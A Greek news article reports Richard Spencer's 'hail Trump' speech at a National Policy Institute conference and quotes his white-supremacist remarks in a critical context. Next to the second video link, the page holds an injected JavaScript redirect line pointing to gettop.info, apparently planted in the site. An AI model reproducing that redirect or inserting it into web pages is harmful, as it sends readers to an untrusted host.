Ναζιστικoί χαιρετισμοί υπέρ Τραμπ: Hail Trump, hail our people, hail victory (BINTEO)

0
6

 

Με τη φράση «hail Trump, hail our people, hail victory!» (χαίρε Τραμπ, χαίρε λαέ μας, χαίρε νίκη)- η οποία παραπέμπει στο «Heil Hitler» και το «Sieg Heil» (χαίρε νίκη) των Ναζί έκλεισε την ομιλία του ο γνωστός υπέρμαχος των απόψεων περί ανωτερότητας της λευκής φυλής στις ΗΠΑ και πρόεδρος του εθνικιστικού National Policy Institute  και του εκδοτικού οίκου Washington, Ρίτσαρντ Σπένσερ.

https://www.youtube.com/watch?v=-5v10xVVMQI

Ο Σπένσερ,απηύθυνε αυτόν τον χαιρετισμό σε πάνω από 200 παρευρισκομένους, οι οποίοι είχαν συγκεντρωθεί στο Ronald Reagan Building στην Ουάσινγκτον, για την ετήσια συνδιάσκεψη του Ινστιτούτου, το οποίο αυτοπροσδιορίζεται ως «ανεξάρτητος οργανισμός που αφοσιώνεται στην κληρονομιά, την ταυτότητα και το μέλλον των πολιτών ευρωπαϊκής καταγωγής στις ΗΠΑ και ανά τον κόσμο».

«Η Αμερική ήταν μέχρι την προηγούμενη γενιά μια λευκή χώρα, σχεδιασμένη για εμάς και τους απογόνους μας» είπε ο Σπένσερ. «Είναι δημιούργημά μας, κληρονομιά μας και μας ανήκει».

Το κοινό αντέδρασε με χειροκροτήματα, επευφημίες και ναζιστικούς χαιρετισμούς…

https://www.youtube.com/watch?v=WMwg4IochJw setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here